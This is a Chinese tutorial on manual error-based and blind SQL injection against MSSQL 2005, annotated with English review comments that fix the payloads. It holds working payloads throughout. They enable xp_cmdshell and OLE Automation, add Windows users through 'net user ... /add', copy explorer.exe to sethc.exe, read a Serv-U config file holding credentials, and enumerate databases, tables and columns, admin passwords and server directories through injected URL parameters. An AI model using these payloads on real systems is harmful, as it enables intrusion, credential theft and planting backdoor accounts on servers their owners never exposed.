
MSSQL2005 手工盲注詳解


一.開啟擴充套件

1.開啟xp_cmdshell

-- Turn on xp_cmdshell (disabled by default on SQL Server 2005).
-- NOTE(review): sp_configure + RECONFIGURE need ALTER SETTINGS (held by
-- sysadmin/serveradmin); the change is recorded in the SQL Server error log.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

2.開啟 'OPENROWSET'(Ad Hoc Distributed Queries)

-- Turn on 'Ad Hoc Distributed Queries' so OPENROWSET/OPENDATASOURCE accept
-- arbitrary provider strings. Same privilege/logging caveat as xp_cmdshell.
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

查詢分析器裡執行

;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')

以此利用 Jet 沙盤(SandBox)模式執行 shell() 來新增管理員。注意:上面兩行只是該語句的後半段,前面的 OPENROWSET(...) 呼叫開頭在本文中已遺失;此法還需要伺服器上存在 Jet OLE DB 提供者且其沙盤模式未被關閉,在較新的系統上通常已不可用。

3.開啟 'sp_oacreate'(Ole Automation Procedures)

-- Turn on 'Ole Automation Procedures' so sp_OACreate/sp_OAMethod can
-- instantiate COM objects inside the server process (sysadmin only).
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

拷貝檔案 d:/windows/explorer.exe 至 c:/sethc.exe(注意:下面語句的目標是 C 槽根目錄,並不會覆蓋 system32 下的 sethc.exe,單靠這一句不會替換「黏滯鍵」處理程式)

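-- Copy d:\windows\explorer.exe to c:\sethc.exe through the FileSystemObject
-- COM server (needs 'Ole Automation Procedures' enabled and sysadmin).
-- Changes vs. the one-liner: the HRESULTs are checked and the COM object is
-- released with sp_OADestroy instead of being leaked in the server process.
-- NOTE(review): the destination is the drive root, not
-- %SystemRoot%\system32\sethc.exe, so this alone does not replace Sticky Keys.
declare @o int, @ret int;
exec @ret = sp_oacreate 'scripting.filesystemobject', @o out;
if @ret = 0
begin
    -- copyfile(source, destination); null = no return value wanted
    exec @ret = sp_oamethod @o, 'copyfile', null, 'd:/windows/explorer.exe', 'c:/sethc.exe';
    exec sp_oadestroy @o;
end;
if @ret <> 0 print 'sp_oa call failed, hresult ' + cast(@ret as varchar(20));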

在查詢分析器裡執行

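-- Run cmd.exe via the WScript.Shell COM server to create local user 'xcode'.
-- Changes vs. the original: HRESULTs are checked and the object is released.
-- NOTE(review): the command only creates the account; nothing here adds it to
-- the Administrators group.
DECLARE @shell INT, @ret INT
EXEC @ret = SP_OAcreate 'wscript.shell', @shell OUTPUT
IF @ret = 0
BEGIN
    -- 'run' returns immediately; the child cmd.exe runs as the service account
    EXEC @ret = SP_OAMETHOD @shell, 'run', null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'
    EXEC SP_OADestroy @shell
END
IF @ret <> 0 PRINT 'sp_oa call failed, hresult ' + CAST(@ret AS VARCHAR(20))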

這段程式碼是利用 SP_OAcreate 呼叫 wscript.shell 執行 net user,新增一個名為 xcode 的本機使用者;注意語句本身只建立帳號,並未把它加入管理員群組,「直接提升為管理員許可權」的說法並不成立。

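-- Print d:\Serv-U6.3\ServUDaemon.ini line by line through the FileSystemObject
-- COM server. Any file readable by the SQL Server service account can be read
-- this way; needs 'Ole Automation Procedures' enabled (sysadmin).
-- Changes vs. the original: unused @t removed, creation/open are checked, the
-- TextStream is closed and both COM objects are released with sp_OADestroy.
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec @ret = sp_oacreate 'scripting.filesystemobject', @o out
if @ret = 0
begin
    -- opentextfile(path, 1 = ForReading)
    exec @ret = sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
    if @ret = 0
    begin
        -- readline returns a non-zero HRESULT at EOF, which ends the loop
        -- (the original loop relied on the same behaviour)
        exec @ret = sp_oamethod @f, 'readline', @line out
        while( @ret = 0 )
        begin
            print @line
            exec @ret = sp_oamethod @f, 'readline', @line out
        end
        exec sp_oamethod @f, 'close'
        exec sp_oadestroy @f
    end
    else
        print 'opentextfile failed'
    exec sp_oadestroy @o
end
else
    print 'sp_oacreate failed'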

這段程式碼就可以把 ServUDaemon.ini 裡的配置資訊全部顯示出來;凡是 SQL Server 服務帳戶可讀的檔案都能用同樣方式讀取。以上三種擴充套件的開啟都需要 sysadmin 等級的許可權,而且 sp_configure 的變更會寫入 SQL Server 錯誤日誌,防守方很容易察覺。

二.有顯錯時:報錯注入(利用字串與數字比較時的型別轉換錯誤,把資料帶進錯誤訊息)。

-- Boolean probe: true while the database count exceeds the left-hand number;
-- vary that number and bisect to get the exact count.
and 0<(select count(*) from master.dbo.sysdatabases);--

折半法得到資料庫個數

-- Error-based: comparing the nvarchar column name with the int 1 forces a
-- conversion error whose message carries the name of the database with dbid=1.
and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

依次提交 dbid = 2、3、4…,得到更多的資料庫名

-- Boolean probe for the number of user tables (xtype='U') in employ.
-- "count(*) name" merely aliases the count as "name"; it is harmless.
and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--

折半法得到表個數(假設暴出庫名employ)

-- Error-based: int vs nvarchar comparison raises a conversion error that
-- leaks one table name. "top 1" has no order by, so which row comes first is
-- not guaranteed; exclude already-seen names with "name not in (...)".
and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--

爆出一個表名

假設暴出表名為 "employ_qj",則在上面語句上加條件 and name not in ('employ_qj'),以此一直加條件…

-- Error-based: leaks one column name of table employ_qj (same conversion
-- trick; unqualified syscolumns/sysobjects refer to the current database).
and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--

爆出一個列名

假設暴出欄位名為 "id",則在上面語句上加上條件 and name not in ('id'),以此一直加條件…

或者

爆庫語句

-- Error-based, one database per request: replace N with 1, 2, 3 ...; the
-- "top N ... order by dbid desc" subquery selects the N-th row and the
-- string-vs-0 comparison raises a conversion error containing "<name>|".
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

爆表語句,somedb部份是所要列的資料庫

-- Error-based, one table per request: char(85) = 'U' (user table);
-- "top N ... order by name" then "top 1 ... order by name desc" picks the
-- N-th table name in somedb and the =0 comparison leaks it via the error.
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

爆欄位語句,爆表 admin 裡 user='admin' 的密碼段(注意:user 在 T-SQL 中是保留字/內建函式,引用該欄位時必須寫成 [user],否則比較的是目前資料庫使用者名稱而不是欄位值)

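-- Error-based extraction of the password for the row whose user column is
-- 'admin'; substitute N (1, 2, ...) to walk through matching rows.
-- Fix: "user" is a T-SQL reserved word (the USER niladic function returning
-- the current database user), so a bare "Where user='admin'" compares the
-- current user name, not the column. The column must be bracketed as [user].
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where [user]='admin' Order by [password]) T Order by [password]Desc)=0--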

三.無顯錯,盲注。

先說下SQL2005中的查詢方法

-- Compatibility views used throughout this article (SQL 2005 also offers
-- sys.databases / sys.objects / sys.columns).
select * from master.dbo.sysdatabases                --list all databases
select * from NetBook.dbo.sysobjects where xtype='u'    --list user tables in NetBook

查詢資料庫NetBook裡的表

select * from NetBook.dbo.syscolumns where id=object_id('book') --columns of table book (object_id resolves in the current database)

查詢book表裡的欄位

判斷許可權(IS_SRVROLEMEMBER 回傳 1 表示是該固定伺服器角色成員,0 表示不是,NULL 表示角色名無效;db_owner 是資料庫角色而非伺服器角色,應改用 IS_MEMBER('db_owner') 判斷):

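-- Fixed-server-role membership probes. Per the docs IS_SRVROLEMEMBER returns
-- 1 (member), 0 (not a member) or NULL (unknown role), so "and 1=(...)" is
-- true only when the current login holds the role.
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
-- Fix: db_owner is a database role, not a server role, so the original
-- IS_SRVROLEMEMBER('db_owner') returns NULL and could never be true.
-- IS_MEMBER checks database-role membership in the current database.
and 1=(select IS_MEMBER('db_owner'))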

盲注常規步驟:

判斷庫是否確實為 MSSQL2005(@@version 以 "Microsoft SQL Server 2005 - " 開頭,故取第 22~25 位;若想更穩妥可改用 SERVERPROPERTY('ProductVersion') 的主版本號 9 來判斷):

http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

猜資料庫名:

先猜dbid:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1

根據dbid猜庫名,先猜出長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1

再逐位猜:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

猜表名(假設庫名已經猜出為 database;注意 database 與下面的 table 在 T-SQL 中都是保留字,實際使用時請換成真實名稱或加上中括號 [database]):

可以嘗試先看有沒管理表:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1

猜第一個,先長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1

猜第一個表名,逐位猜:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1

猜第二個表名(假設第一個為 table1):

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1

以此類推。

猜欄位(假設表名已經猜出為 table;同上,實際使用時請換成真實名稱或寫成 [table]):

猜第一個欄位:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二個(假設第一個為column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1

猜資料(假設要猜的欄位為 name;下面的 top 1 沒有 order by,取到哪一列並不確定,要取後續列時同樣用 name not in (...) 排除已猜出的值):

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database.dbo.table) and ascii(substring(name,1,1))>90)=1

四.其他一些語句(列目錄)

1.檢視驅動器

建表p(i為自動編號,a記錄碟符類似"c:/",b記錄可用位元組,其它省略)

-- Scratch table for the xp_availablemedia result set: a = drive (e.g. "c:\"),
-- b = free-space figure, c/d = the remaining two columns. The identity column
-- i is skipped by insert...exec, so the 4 result columns map onto a..d.
-- Needs CREATE TABLE rights in the current database; drop it afterwards.
;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--
-- insert ... exec requires the procedure's column count to match the table
;insert p exec xp_availablemedia;--

列出所有驅動器並插入表p

-- Blind: bisect the row count of p (= number of drives found)
and (select count(*) from p)>3;--bisect to find the number of drives
-- Blind: test whether the first character of drive 1's name is ascii 67 ('C')
and ascii(substring((select a from p where i=1),1,1))=67;--

折半法查出驅動器名(注:ascii('C')=67)
上面一般用於無顯錯情況下使用-------以此類推,得到所有驅動器名

-- Error-based: nvarchar drive name vs int 3 forces a conversion error whose
-- message contains the name of drive 1
and (select a from p where i=1)>3;--

報錯得到第一個驅動器名
上面一般用於顯錯情況下使用-------以此類推,得到所有驅動器名

-- Remove the scratch table so no artefact is left in the target database
;drop table p;--

刪除表p

2.檢視目錄

-- Scratch table for xp_dirtree output: m = subdirectory name, i = depth
-- (stored as nvarchar here and compared with ints later via implicit
-- conversion, which works because every depth value is numeric)
;create table pa(m nvarchar(255),i nvarchar(255));--

建表 pa(m 記錄目錄,i 記錄深度)

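-- xp_dirtree 'e:' with a single argument returns two columns (subdirectory,
-- depth), matching pa(m, i). It runs as the SQL Server service account.
;insert pa exec xp_dirtree 'e:';--list drive e: into table pa
-- Fix: the original compared count(*) with -1, which is always true and
-- therefore reveals nothing. count(*)>0 is true iff some directory is deeper
-- than the bound; raise the number in "i>0" and bisect to find the max depth.
and (select count(*) from pa where i>0)>0;--
-- Error-based: nvarchar vs int comparison raises a conversion error that
-- carries the directory name (no error if the name is purely numeric).
-- "top 0" / "top 1" in the exclusion subquery walks rows, but without an
-- order by the row order is not guaranteed.
and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--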

報錯得到深度i=1的第一個目錄名
上面一般用顯錯且目錄名不為數字情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

-- Blind: bisect the length of the first depth-1 directory name
-- (same caveat: "top 1" without order by is not a guaranteed order)
and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--

折半法查出深度i=1的第一個目錄名的長度

-- Blind: bisect the ascii value of character 1 of that directory name;
-- move the substring offset to recover the remaining characters
and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--

折半法查出深度i=1的第一個目錄名的第一個字元長度
上面一般用無顯錯情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

-- Remove the scratch table once the listing is done
;drop table pa;--

刪除表pa

經過上面的方法就可得到伺服器所有目錄(準確地說,是 SQL Server 服務帳戶有讀取許可權的目錄:xp_dirtree 等擴充套件是以服務帳戶而非連線使用者的身分執行)。